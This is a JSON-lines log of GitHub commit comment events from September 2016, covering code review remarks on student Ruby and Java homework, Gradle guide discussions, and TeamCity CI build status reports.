{"id":"4526662405","type":"CommitCommentEvent","actor":{"login":"vkurennov"},"repo":{"name":"Melevolen/ruby_way"},"payload":{"comment":{"id":18925997,"position":62,"line":86,"path":"lesson_9/modules.rb","commit_id":"815585c3b1d501e2089fff5f1eca2c8c0e642331","created_at":"2016-09-07T10:07:45Z","updated_at":"2016-09-07T10:07:45Z","body":"И почему ты берешь только name? Откуда он вообще возьмется? У тебя в правилах - хеш, ты же не знаешь, какие там ключи. Поэтому надо сначала перебрать хеш, а потом уже у каждого ключа еще и значение перебирать"}},"created_at":"2016-09-07T10:07:45Z"}
{"id":"4526664551","type":"CommitCommentEvent","actor":{"login":"jeroenooms"},"repo":{"name":"hunspell/hunspell"},"payload":{"comment":{"id":18926002,"position":null,"line":null,"path":null,"commit_id":"589e3c96715db099216a78f38f609fb84fd36e62","created_at":"2016-09-07T10:08:14Z","updated_at":"2016-09-07T10:08:14Z","body":"I don't think this is fully solved. I still get crashes for `hu_HU` when using the `pMS_->suggest(str)` a few times in a row."}},"created_at":"2016-09-07T10:08:14Z"}
{"id":"4526666268","type":"CommitCommentEvent","actor":{"login":"vkurennov"},"repo":{"name":"Melevolen/ruby_way"},"payload":{"comment":{"id":18926006,"position":63,"line":87,"path":"lesson_9/modules.rb","commit_id":"815585c3b1d501e2089fff5f1eca2c8c0e642331","created_at":"2016-09-07T10:08:35Z","updated_at":"2016-09-07T10:08:35Z","body":"У тебя методы валидации принимают 2 параметра: имя атрибута и параметры валидации, но ты передаешь только параметры валидации"}},"created_at":"2016-09-07T10:08:35Z"}
{"id":"4526667522","type":"CommitCommentEvent","actor":{"login":"mkaput"},"repo":{"name":"intellij-rust/intellij-rust"},"payload":{"comment":{"id":18926011,"position":null,"line":null,"path":null,"commit_id":"2144cda4c8e696ed730bf49fc42c0ed5541a7ee0","created_at":"2016-09-07T10:08:50Z","updated_at":"2016-09-07T10:08:50Z","body":":tada: "}},"created_at":"2016-09-07T10:08:50Z"}
{"id":"4526668822","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":18926014,"position":null,"line":null,"path":null,"commit_id":"6bd8d9f27e992ab44a3d6eb8e195b9316113dd38","created_at":"2016-09-07T10:09:08Z","updated_at":"2016-09-07T10:09:08Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 951](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=12843&buildTypeId=ota_plus_RviSotaServer_Ci) is now running\n"}},"created_at":"2016-09-07T10:09:08Z"}
{"id":"4526669032","type":"CommitCommentEvent","actor":{"login":"cakecatz"},"repo":{"name":"cakecatz/flex-toolbar"},"payload":{"comment":{"id":18926016,"position":14,"line":195,"path":"lib/flex-tool-bar.coffee","commit_id":"e08b6d118a5ddc28fe8c91864d4d0055ae2bd9ca","created_at":"2016-09-07T10:09:10Z","updated_at":"2016-09-07T10:09:10Z","body":"👍 "}},"created_at":"2016-09-07T10:09:10Z"}
{"id":"4526669824","type":"CommitCommentEvent","actor":{"login":"vkurennov"},"repo":{"name":"Melevolen/ruby_way"},"payload":{"comment":{"id":18926017,"position":115,"line":111,"path":"lesson_9/modules.rb","commit_id":"815585c3b1d501e2089fff5f1eca2c8c0e642331","created_at":"2016-09-07T10:09:19Z","updated_at":"2016-09-07T10:09:19Z","body":"Ты сравниваешь имя атрибута, а не его значение. Надо сначала получить значение, и лучше это сделать в методе validate! и передавать уже значение в сами методы валидаций."}},"created_at":"2016-09-07T10:09:19Z"}
{"id":"4526672631","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":18926023,"position":null,"line":null,"path":null,"commit_id":"4ed46a5dc2dbe1f917610e94ff2ae8d4527c57a6","created_at":"2016-09-07T10:09:56Z","updated_at":"2016-09-07T10:09:56Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 950](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=12841&buildTypeId=ota_plus_RviSotaServer_Ci) outcome was **FAILURE**\nSummary: Tests failed: 21 (21 new), passed: 193, ignored: 3 Build time: 00:07:09\n### Failed tests\n```\norg.genivi.sota.device_registry.test.DeviceResourceSpec.GET, PUT, DELETE, and POST '/ping' request fails on non-existent device: <no details avaliable>\n\norg.genivi.sota.device_registry.test.DeviceResourceSpec.GET /group_info request fails on non-existent device: <no details avaliable>\n\norg.genivi.sota.device_registry.test.DeviceResourceSpec.GET request (for Id) after POST yields same device: <no details avaliable>\n\norg.genivi.sota.device_registry.test.DeviceResourceSpec.GET request with ?deviceId after creating yields same device.: <no details avaliable>\n\norg.genivi.sota.device_registry.test.DeviceResourceSpec.GET request with ?regex yields devices which match the regex.: <no details avaliable>\n\norg.genivi.sota.device_registry.test.DeviceResourceSpec.PUT request after POST succeeds with updated device.: <no details avaliable>\n\norg.genivi.sota.device_registry.test.DeviceResourceSpec.POST request creates a new device.: <no details avaliable>\n\norg.genivi.sota.device_registry.test.DeviceResourceSpec.DELETE request after POST succeds and deletes device.: <no details avaliable>\n\norg.genivi.sota.device_registry.test.DeviceResourceSpec.POST request on 'ping' should update 'lastSeen' field for device.: <no details avaliable>\n\norg.genivi.sota.device_registry.test.DeviceResourceSpec.POST request with same deviceName fails with conflict.: <no details avaliable>\n\norg.genivi.sota.device_registry.test.DeviceResourceSpec.POST request with same deviceId fails with conflict.: <no details avaliable>\n\n\n##### there are 11 more failed tests, see build details\n```\n"}},"created_at":"2016-09-07T10:09:56Z"}
{"id":"4526674254","type":"CommitCommentEvent","actor":{"login":"pledbrook"},"repo":{"name":"gradle-guides/gs-building-java-libraries"},"payload":{"comment":{"id":18926029,"position":8,"line":145,"path":"README.adoc","commit_id":"6e3c5380d6db76e94793de0517063757efc83099","created_at":"2016-09-07T10:10:16Z","updated_at":"2016-09-07T10:10:16Z","body":"My point is that it's still a magical incantation unless the reader understands the following:\r\n\r\n - `jar` is an object representing a specific instance of a `Jar` task\r\n - dot-notations allows you to set properties and call methods on that object\r\n - the braces syntax is a way to configure settings on a task and applies to all task objects\r\n\r\nI agree that this is an excellent learning opportunity, I just don't think we have the material yet to introduce readers to the above points without causing confusion.\r\n\r\nIn fact, perhaps the example should use the `jar.manifest {}` syntax to eliminate one of the magic aspects of Gradle configuration."}},"created_at":"2016-09-07T10:10:16Z"}
{"id":"4526674836","type":"CommitCommentEvent","actor":{"login":"Polycarpik"},"repo":{"name":"KoliushkoArtem/JavaCoreCourse"},"payload":{"comment":{"id":18926031,"position":6,"line":6,"path":"src/module4/homework/Currency.java","commit_id":"5c52a7c5f18abd7bc687af4b3d825bd40876106d","created_at":"2016-09-07T10:10:24Z","updated_at":"2016-09-07T10:10:24Z","body":"Злой комментарий!"}},"created_at":"2016-09-07T10:10:24Z"}
{"id":"4526675318","type":"CommitCommentEvent","actor":{"login":"althaf-miki"},"repo":{"name":"althaf-miki/CurrencyExchangeAndroidApp"},"payload":{"comment":{"id":18926033,"position":null,"line":null,"path":null,"commit_id":"b6c459416286c30d8737f43bad8e0be594cc98c7","created_at":"2016-09-07T10:10:29Z","updated_at":"2016-09-07T10:10:29Z","body":"This  is an android app for currency exchange.\r\n"}},"created_at":"2016-09-07T10:10:29Z"}
{"id":"4526678452","type":"CommitCommentEvent","actor":{"login":"diogin"},"repo":{"name":"golang/go"},"payload":{"comment":{"id":18926049,"position":null,"line":null,"path":null,"commit_id":"ca264cdc6247141a1e042f38c83fff4783f03324","created_at":"2016-09-07T10:11:08Z","updated_at":"2016-09-07T10:11:08Z","body":"Hi Brad,\r\n\r\nSorry to have misled you, but the correct error code here is not WSAEINPROGRESS, it is WSA_IO_PENDING (code 997), see: https://msdn.microsoft.com/en-us/library/ms740668(v=vs.85).aspx#WSA_IO_PENDING\r\n\r\nI apologize for the misleading again!"}},"created_at":"2016-09-07T10:11:08Z"}
{"id":"4526679406","type":"CommitCommentEvent","actor":{"login":"olegik-orlov"},"repo":{"name":"DimOOOn91/Lesovoy"},"payload":{"comment":{"id":18926054,"position":34,"line":34,"path":"src/module03/homework/task3/SpecialStudent.java","commit_id":"ee973c05257882211cb0f0d2e79855c1a3101f28","created_at":"2016-09-07T10:11:22Z","updated_at":"2016-09-07T10:11:22Z","body":"согласен в задании действительно нет, я тут погорячился"}},"created_at":"2016-09-07T10:11:22Z"}
{"id":"4526683188","type":"CommitCommentEvent","actor":{"login":"Karel-Kroeze"},"repo":{"name":"Karel-Kroeze/ShadowCAT"},"payload":{"comment":{"id":18926064,"position":null,"line":null,"path":null,"commit_id":"e8d5385f550e3f46ca0f56b364f2ca6be6c39f5a","created_at":"2016-09-07T10:12:10Z","updated_at":"2016-09-07T10:12:10Z","body":"resolves #5 "}},"created_at":"2016-09-07T10:12:10Z"}
{"id":"4526683838","type":"CommitCommentEvent","actor":{"login":"vkurennov"},"repo":{"name":"Melevolen/ruby_way"},"payload":{"comment":{"id":18926067,"position":13,"line":24,"path":"lesson_9/train.rb","commit_id":"815585c3b1d501e2089fff5f1eca2c8c0e642331","created_at":"2016-09-07T10:12:17Z","updated_at":"2016-09-07T10:12:17Z","body":"Ты неправильно метод вызывашь, поэтому он и не виден. Здесь ты пытаешься вызывать инстанс-метод validate, но его не существует. И что такое name в данном вызове? Идея в том, чтобы валидации задавать в декларативном стиле, как, например, attr_accessor:\r\n\r\n```\r\n class Train\r\n   include Validation\r\n   attr_accessor :speed, :number\r\n\r\n  validate :number, :presence\r\n  validate :number, :format, NUMBER_FORMAT\r\n  validate :speed, :type, Fixnum\r\n\r\n  # ...\r\nend\r\n```\r\n"}},"created_at":"2016-09-07T10:12:17Z"}
{"id":"4526685467","type":"CommitCommentEvent","actor":{"login":"micaelmbagira"},"repo":{"name":"FountainJS/generator-fountain-gulp"},"payload":{"comment":{"id":18926072,"position":null,"line":null,"path":null,"commit_id":"4bf94eb8eda4c2c43489fdefe880b9efbaebb1fc","created_at":"2016-09-07T10:12:37Z","updated_at":"2016-09-07T10:12:37Z","body":"But for Webpack we now use html-loader"}},"created_at":"2016-09-07T10:12:37Z"}
{"id":"4526685733","type":"CommitCommentEvent","actor":{"login":"BrunoWei"},"repo":{"name":"BrunoWei/ms_demo"},"payload":{"comment":{"id":18926074,"position":null,"line":null,"path":null,"commit_id":"a7ae4edf7c799d57d69aadb66281c2927b1ec563","created_at":"2016-09-07T10:12:41Z","updated_at":"2016-09-07T10:12:41Z","body":"TeamCity Ms Demo :: Build [Build 30](http://10.22.17.95:8111/viewLog.html?buildId=55&buildTypeId=MsDemo_Build) is now running\n"}},"created_at":"2016-09-07T10:12:41Z"}
{"id":"4526686027","type":"CommitCommentEvent","actor":{"login":"mbaechler"},"repo":{"name":"linagora/james-project"},"payload":{"comment":{"id":18926076,"position":13,"line":208,"path":"mailbox/store/src/main/java/org/apache/james/mailbox/store/StoreMailboxManager.java","commit_id":"99e2d57fdc575a03e65760fc29751b3829511092","created_at":"2016-09-07T10:12:44Z","updated_at":"2016-09-07T10:12:44Z","body":"what is this `null` for ?"}},"created_at":"2016-09-07T10:12:44Z"}
{"id":"4526687686","type":"CommitCommentEvent","actor":{"login":"BrunoWei"},"repo":{"name":"BrunoWei/ms_demo"},"payload":{"comment":{"id":18926080,"position":null,"line":null,"path":null,"commit_id":"a7ae4edf7c799d57d69aadb66281c2927b1ec563","created_at":"2016-09-07T10:13:08Z","updated_at":"2016-09-07T10:13:08Z","body":"TeamCity Ms Demo :: Build [Build 30](http://10.22.17.95:8111/viewLog.html?buildId=55&buildTypeId=MsDemo_Build) outcome was **FAILURE**\nSummary: Tests failed: 1, passed: 3 Build time: 00:00:28\n### Failed tests\n```\ncom.epam.clientprofolio.dao.ClientProfolioDaoTest.shouldGetClientProfolioById: <no details avaliable>\n\n```\n"}},"created_at":"2016-09-07T10:13:08Z"}
{"id":"4526688819","type":"CommitCommentEvent","actor":{"login":"DimOOOn91"},"repo":{"name":"DimOOOn91/Lesovoy"},"payload":{"comment":{"id":18926082,"position":68,"line":68,"path":"src/module04/homework/task1/Bank.java","commit_id":"ee973c05257882211cb0f0d2e79855c1a3101f28","created_at":"2016-09-07T10:13:22Z","updated_at":"2016-09-07T10:13:22Z","body":"исправил"}},"created_at":"2016-09-07T10:13:22Z"}
{"id":"4526688828","type":"CommitCommentEvent","actor":{"login":"pledbrook"},"repo":{"name":"gradle-guides/gs-building-java-libraries"},"payload":{"comment":{"id":18926083,"position":5,"line":27,"path":"build.gradle","commit_id":"6e3c5380d6db76e94793de0517063757efc83099","created_at":"2016-09-07T10:13:22Z","updated_at":"2016-09-07T10:13:22Z","body":"Fair point. I'm not convinced the Gradle DSL is a language as such - I prefer API. But certainly removing talk of DSL makes sense. It's also an important step in moving people's attention from \"It's just a Groovy DSL - Maven has one of those\" to the reality of Gradle's rich API/language."}},"created_at":"2016-09-07T10:13:22Z"}
{"id":"4526690875","type":"CommitCommentEvent","actor":{"login":"mbaechler"},"repo":{"name":"linagora/james-project"},"payload":{"comment":{"id":18926088,"position":46,"line":46,"path":"mailbox/store/src/main/java/org/apache/james/mailbox/store/event/MailboxAnnotationListener.java","commit_id":"99e2d57fdc575a03e65760fc29751b3829511092","created_at":"2016-09-07T10:13:48Z","updated_at":"2016-09-07T10:13:48Z","body":"what are the consequences of asynchronous here ?"}},"created_at":"2016-09-07T10:13:48Z"}
{"id":"4526691901","type":"CommitCommentEvent","actor":{"login":"akva2"},"repo":{"name":"notspiff/inputstream.rtmp"},"payload":{"comment":{"id":18926090,"position":4,"line":10,"path":"CMakeLists.txt","commit_id":"e5e4cee142c6614664448318c7b3df3b3809930e","created_at":"2016-09-07T10:14:01Z","updated_at":"2016-09-07T10:14:01Z","body":"please try HEAD."}},"created_at":"2016-09-07T10:14:01Z"}
{"id":"4526692214","type":"CommitCommentEvent","actor":{"login":"Walchanov"},"repo":{"name":"Walchanov/Hello-World"},"payload":{"comment":{"id":18926092,"position":null,"line":null,"path":null,"commit_id":"282038920b1fb518548dbe7753a704bb6b0c3176","created_at":"2016-09-07T10:14:06Z","updated_at":"2016-09-07T10:14:06Z","body":"Hi i am Vasko!"}},"created_at":"2016-09-07T10:14:06Z"}
{"id":"4526694830","type":"CommitCommentEvent","actor":{"login":"Dream-Master"},"repo":{"name":"GTNewHorizons/NewHorizonsCoreMod"},"payload":{"comment":{"id":18926096,"position":null,"line":null,"path":null,"commit_id":"b6096dcf727bb8a8d577085df282adb6c247a2d5","created_at":"2016-09-07T10:14:36Z","updated_at":"2016-09-07T10:14:36Z","body":"Oriharukon isn't a high tier metal. I don't know if Bedrockim is a good choice for a cable. Better using awakened Draconium and Infinty."}},"created_at":"2016-09-07T10:14:36Z"}
{"id":"4526695581","type":"CommitCommentEvent","actor":{"login":"mbaechler"},"repo":{"name":"linagora/james-project"},"payload":{"comment":{"id":18926099,"position":53,"line":53,"path":"mailbox/store/src/main/java/org/apache/james/mailbox/store/event/MailboxAnnotationListener.java","commit_id":"99e2d57fdc575a03e65760fc29751b3829511092","created_at":"2016-09-07T10:14:46Z","updated_at":"2016-09-07T10:14:46Z","body":"all that deserves a method, something like : `deleteRelatedAnnotations`"}},"created_at":"2016-09-07T10:14:46Z"}
{"id":"4526699203","type":"CommitCommentEvent","actor":{"login":"graingert"},"repo":{"name":"akx/django-babel"},"payload":{"comment":{"id":18926106,"position":null,"line":null,"path":null,"commit_id":"1792b0c8c84a532d714c2bdb7f4feeb33653b0ba","created_at":"2016-09-07T10:15:30Z","updated_at":"2016-09-07T10:15:30Z","body":"fyi, tagging people in commits means a new email every time someone rebases it etc."}},"created_at":"2016-09-07T10:15:30Z"}
{"id":"4526703645","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":18926112,"position":null,"line":null,"path":null,"commit_id":"6bd8d9f27e992ab44a3d6eb8e195b9316113dd38","created_at":"2016-09-07T10:16:25Z","updated_at":"2016-09-07T10:16:25Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 951](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=12843&buildTypeId=ota_plus_RviSotaServer_Ci) outcome was **SUCCESS**\nSummary: Tests passed: 237, ignored: 3 Build time: 00:07:17"}},"created_at":"2016-09-07T10:16:25Z"}
{"id":"4526709899","type":"CommitCommentEvent","actor":{"login":"olegik-orlov"},"repo":{"name":"khalymon/Module_02"},"payload":{"comment":{"id":18926125,"position":96,"line":96,"path":"Module_02/src/Task1/Task1.java","commit_id":"5c5aa3c158b9442242d38a85db6031c752f1952d","created_at":"2016-09-07T10:17:42Z","updated_at":"2016-09-07T10:17:42Z","body":"Попробуй этот метод уменьшить до одного фора. Ниже подсказка\r\nВесь первый фор и присвоение первого значения отрицательным максимальным можно заменить на на присвоение Integer.MIN_VALUE"}},"created_at":"2016-09-07T10:17:42Z"}
{"id":"4526715029","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":18926134,"position":null,"line":null,"path":null,"commit_id":"85f6ee20c5cfb23294b82026aa494f3317320670","created_at":"2016-09-07T10:18:45Z","updated_at":"2016-09-07T10:18:45Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 952](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=12844&buildTypeId=ota_plus_RviSotaServer_Ci) is now running\n"}},"created_at":"2016-09-07T10:18:45Z"}
{"id":"4526716290","type":"CommitCommentEvent","actor":{"login":"cbeams"},"repo":{"name":"gradle-guides/gs-building-java-libraries"},"payload":{"comment":{"id":18926137,"position":10,"line":8,"path":"README.adoc","commit_id":"0fbe0eff761a43784f6d49c928179bb4a3689312","created_at":"2016-09-07T10:18:59Z","updated_at":"2016-09-07T10:18:59Z","body":"I'm not 100% on whether we should do these sorts of links, either, but here's my rationale for erring on the side of doing so:\r\n\r\n - These guides are written with as few assumptions as possible about the reader's prior experience. In this particular case, the title is \"Getting Started Building Java Libraries\". Let's assume for a moment, that the reader of this guide is someone primarily familiar with the Node or Ruby or C++ ecosystems. They are well aware of what libraries are, why you'd want them, and how it works to publish and consume them in the ecosystem(s) they're already familiar with, but they know nothing about the specifics of working with libraries in Java. This user, may appreciate very much the fact that we have not assumed they know what a JAR is, and that we've taken the time to link to the canonical resource for finding out more about what they are.\r\n\r\n - For those readers who know perfectly well what a JAR is, and do not want to be bothered by any explanations or digressions on the topic, they can simply skip over that hyperlink,  and we will have wasted none of their time.\r\n\r\n - It is good from an SEO perspective for a document like this, that we want to become authoritative, to refer to other resources on the web that are already recognized as being authoritative on topics closely related to the content of this document.\r\n\r\n - Given our strong Java/JVM history and bias, it may seem wasteful or silly to link to the definition of what a JAR is, but as we move up the stack into more complex or esoteric concepts (think OSGi or various checksumming algorithms for example), the value of these links will become more obvious in their value.\r\n\r\nThoughts?"}},"created_at":"2016-09-07T10:18:59Z"}
{"id":"4526716959","type":"CommitCommentEvent","actor":{"login":"olegik-orlov"},"repo":{"name":"khalymon/Module_02"},"payload":{"comment":{"id":18926138,"position":106,"line":106,"path":"Module_02/src/Task1/Task1.java","commit_id":"5c5aa3c158b9442242d38a85db6031c752f1952d","created_at":"2016-09-07T10:19:09Z","updated_at":"2016-09-07T10:19:09Z","body":"Не к чему так явно скобками разделять условия!"}},"created_at":"2016-09-07T10:19:09Z"}
{"id":"4526718969","type":"CommitCommentEvent","actor":{"login":"unintendedbear"},"repo":{"name":"geneura-papers/2015_books"},"payload":{"comment":{"id":18926145,"position":null,"line":null,"path":null,"commit_id":"eb253574a3feedb8b826b55d506096b70c82967f","created_at":"2016-09-07T10:19:32Z","updated_at":"2016-09-07T10:19:32Z","body":"Can I go then with the full revision?"}},"created_at":"2016-09-07T10:19:32Z"}
{"id":"4526719301","type":"CommitCommentEvent","actor":{"login":"hiroichifukuda"},"repo":{"name":"hiroichifukuda/wideone"},"payload":{"comment":{"id":18926146,"position":null,"line":null,"path":null,"commit_id":"bbe45ef67b1ed7ebc60a4af1a384a8e435cc35e6","created_at":"2016-09-07T10:19:36Z","updated_at":"2016-09-07T10:19:36Z","body":"テストページです"}},"created_at":"2016-09-07T10:19:36Z"}
{"id":"4526723025","type":"CommitCommentEvent","actor":{"login":"niks660097"},"repo":{"name":"technomaniac/trellio"},"payload":{"comment":{"id":18926159,"position":10,"line":8,"path":"trellio/service_manager.py","commit_id":"d3073a416439fc59a7d386ecec1eebda4c80edc6","created_at":"2016-09-07T10:20:22Z","updated_at":"2016-09-07T10:20:22Z","body":"delay is not needed."}},"created_at":"2016-09-07T10:20:22Z"}
{"id":"4526725404","type":"CommitCommentEvent","actor":{"login":"mcostalba"},"repo":{"name":"ajithcj/Stockfish"},"payload":{"comment":{"id":18926164,"position":null,"line":null,"path":null,"commit_id":"fd95e858fda90723c6cd5032f46b43c46e1e5800","created_at":"2016-09-07T10:20:49Z","updated_at":"2016-09-07T10:20:49Z","body":"@ajithcj if a patch is quite big, and adding gives_threat() it is, then it should be successful by itself, without help from another patch.\r\n\r\nThe rationale is that we want to have good reasons to add a good bunch of code. That's why we run with SPRT[0, 5] in first instance.\r\n\r\nSo you are taking a big patch and test it together with a small helper, this is like doping the big patch :-) to win the race, this is not allowed.\r\n"}},"created_at":"2016-09-07T10:20:49Z"}
{"id":"4526725737","type":"CommitCommentEvent","actor":{"login":"2color"},"repo":{"name":"callahad/jsis-newweb"},"payload":{"comment":{"id":18926165,"position":null,"line":null,"path":null,"commit_id":"a1aed4264dedcc634c69cf5328ffceaea742c4ce","created_at":"2016-09-07T10:20:53Z","updated_at":"2016-09-07T10:20:53Z","body":"👍 "}},"created_at":"2016-09-07T10:20:53Z"}
{"id":"4526729001","type":"CommitCommentEvent","actor":{"login":"samsalisbury"},"repo":{"name":"nyarly/sous"},"payload":{"comment":{"id":18926171,"position":74,"line":74,"path":"server/router.go","commit_id":"45b4446bfe21e550b1346f087b754f7ba07e56dd","created_at":"2016-09-07T10:21:32Z","updated_at":"2016-09-07T10:21:32Z","body":"Maybe we should add a CloneAdd method that groups a Clone with an Add, since they probably occur together most of the time, e.g. `g.CloneAdd(w, r, p)`. CloneAdd sounds clunky, but is consistent. I prefer `CloneWith` but feel like I'm breaking consistency for aesthetics. What do you think?\r\n\r\nWell, time to stop bike shedding, it would only save one line so maybe not even worth doing."}},"created_at":"2016-09-07T10:21:32Z"}
{"id":"4526732506","type":"CommitCommentEvent","actor":{"login":"ottowayne"},"repo":{"name":"PokemonGoMap/PokemonGo-Map"},"payload":{"comment":{"id":18926179,"position":null,"line":null,"path":null,"commit_id":"4d4a1461e6501afc85cd81d77f9c0915bc9cbb02","created_at":"2016-09-07T10:22:17Z","updated_at":"2016-09-07T10:22:17Z","body":"Seriously, these commit messages..."}},"created_at":"2016-09-07T10:22:17Z"}
{"id":"4526736083","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":18926183,"position":null,"line":null,"path":null,"commit_id":"1fd25bcc33a0e50b74fec409e83e2d52d2360da8","created_at":"2016-09-07T10:23:01Z","updated_at":"2016-09-07T10:23:01Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 953](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=12849&buildTypeId=ota_plus_RviSotaServer_Ci) is now running\n"}},"created_at":"2016-09-07T10:23:01Z"}
{"id":"4526740490","type":"CommitCommentEvent","actor":{"login":"olegik-orlov"},"repo":{"name":"khalymon/Module_02"},"payload":{"comment":{"id":18926188,"position":4,"line":4,"path":"Module_02/src/Tasks234/Task2.java","commit_id":"5c5aa3c158b9442242d38a85db6031c752f1952d","created_at":"2016-09-07T10:23:55Z","updated_at":"2016-09-07T10:23:55Z","body":"На переделку!\r\nЗадача стаяла написать метод который вычисляет, а не выводит. [Write method which withdraw money from account and takes commision 5% of the transaction.]\r\nВывод результатов работы метода должен делаться в методе main"}},"created_at":"2016-09-07T10:23:55Z"}
{"id":"4526742789","type":"CommitCommentEvent","actor":{"login":"samsalisbury"},"repo":{"name":"nyarly/sous"},"payload":{"comment":{"id":18926193,"position":37,"line":37,"path":"server/router.go","commit_id":"45b4446bfe21e550b1346f087b754f7ba07e56dd","created_at":"2016-09-07T10:24:22Z","updated_at":"2016-09-07T10:24:22Z","body":"Does this compile? It doesn't for me, I get:\r\n\r\n    const initializer []string literal is not a constant"}},"created_at":"2016-09-07T10:24:22Z"}
{"id":"4526750164","type":"CommitCommentEvent","actor":{"login":"olegik-orlov"},"repo":{"name":"khalymon/Module_02"},"payload":{"comment":{"id":18926211,"position":4,"line":4,"path":"Module_02/src/Tasks234/Task3.java","commit_id":"5c5aa3c158b9442242d38a85db6031c752f1952d","created_at":"2016-09-07T10:25:55Z","updated_at":"2016-09-07T10:25:55Z","body":"На переделку!\r\nТа же ошибка что и с предыдущим заданием. Задача стаяла написать метод который вычисляет, а не выводит.\r\nВывод результатов работы метода должен делаться в методе main"}},"created_at":"2016-09-07T10:25:55Z"}
{"id":"4526751328","type":"CommitCommentEvent","actor":{"login":"mackermans"},"repo":{"name":"sanack/node-jq"},"payload":{"comment":{"id":18926214,"position":3,"line":39,"path":"scripts/install-binary.js","commit_id":"7cafa5343d7680c675511bb981bec05631b31240","created_at":"2016-09-07T10:26:10Z","updated_at":"2016-09-07T10:26:10Z","body":"Don't log the error"}},"created_at":"2016-09-07T10:26:10Z"}
{"id":"4526753401","type":"CommitCommentEvent","actor":{"login":"olegik-orlov"},"repo":{"name":"khalymon/Module_02"},"payload":{"comment":{"id":18926218,"position":4,"line":4,"path":"Module_02/src/Tasks234/Task4.java","commit_id":"5c5aa3c158b9442242d38a85db6031c752f1952d","created_at":"2016-09-07T10:26:33Z","updated_at":"2016-09-07T10:26:33Z","body":"На переделку!\r\nТа же ошибка что и с предыдущим заданием. Задача стаяла написать метод который вычисляет, а не выводит.\r\nВывод результатов работы метода должен делаться в методе main"}},"created_at":"2016-09-07T10:26:33Z"}
{"id":"4526756401","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":18926220,"position":null,"line":null,"path":null,"commit_id":"85f6ee20c5cfb23294b82026aa494f3317320670","created_at":"2016-09-07T10:27:11Z","updated_at":"2016-09-07T10:27:11Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 952](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=12844&buildTypeId=ota_plus_RviSotaServer_Ci) outcome was **SUCCESS**\nSummary: Tests passed: 237, ignored: 3 Build time: 00:08:27"}},"created_at":"2016-09-07T10:27:11Z"}
{"id":"4526756770","type":"CommitCommentEvent","actor":{"login":"Simn"},"repo":{"name":"HaxeFoundation/haxelib"},"payload":{"comment":{"id":18926221,"position":null,"line":null,"path":null,"commit_id":"c124d95be27073728214eab3137d6b613bfd8fee","created_at":"2016-09-07T10:27:16Z","updated_at":"2016-09-07T10:27:16Z","body":"Do we really have to use two branches to begin with?"}},"created_at":"2016-09-07T10:27:16Z"}
{"id":"4526762832","type":"CommitCommentEvent","actor":{"login":"andersevenrud"},"repo":{"name":"os-js/OS.js"},"payload":{"comment":{"id":18926229,"position":null,"line":null,"path":null,"commit_id":"9aecfdd73a26a2102d5279de4342a98c1bed896f","created_at":"2016-09-07T10:28:33Z","updated_at":"2016-09-07T10:28:33Z","body":"@khoaakt Indeed! I can't believe I let that one slip through! I'm adding some markup checks to my unit tests now :)"}},"created_at":"2016-09-07T10:28:33Z"}
{"id":"4526769804","type":"CommitCommentEvent","actor":{"login":"andyli"},"repo":{"name":"HaxeFoundation/haxelib"},"payload":{"comment":{"id":18926239,"position":null,"line":null,"path":null,"commit_id":"c124d95be27073728214eab3137d6b613bfd8fee","created_at":"2016-09-07T10:30:03Z","updated_at":"2016-09-07T10:30:03Z","body":"We want to preview website changes before going live."}},"created_at":"2016-09-07T10:30:03Z"}
{"id":"4526769852","type":"CommitCommentEvent","actor":{"login":"olegik-orlov"},"repo":{"name":"khalymon/Module_02"},"payload":{"comment":{"id":18926240,"position":47,"line":47,"path":"Module_02/src/Task1/Task1.java","commit_id":"5c5aa3c158b9442242d38a85db6031c752f1952d","created_at":"2016-09-07T10:30:03Z","updated_at":"2016-09-07T10:30:03Z","body":"рекомендую всегда явно указывать фигурные скобки, даже если происходит всего одно действие, у вас в этом задании во многих методах написано так."}},"created_at":"2016-09-07T10:30:03Z"}
{"id":"4526774046","type":"CommitCommentEvent","actor":{"login":"udeved"},"repo":{"name":"manjaro/manjaro-tools-iso-profiles"},"payload":{"comment":{"id":18926246,"position":null,"line":null,"path":null,"commit_id":"ed1d193dd05c8d3e290e4638be358d98660a9e79","created_at":"2016-09-07T10:30:55Z","updated_at":"2016-09-07T10:30:55Z","body":"Do we need these other drivers still?\r\nI thought they'd be covered by xf86-input-libinput as well?"}},"created_at":"2016-09-07T10:30:55Z"}
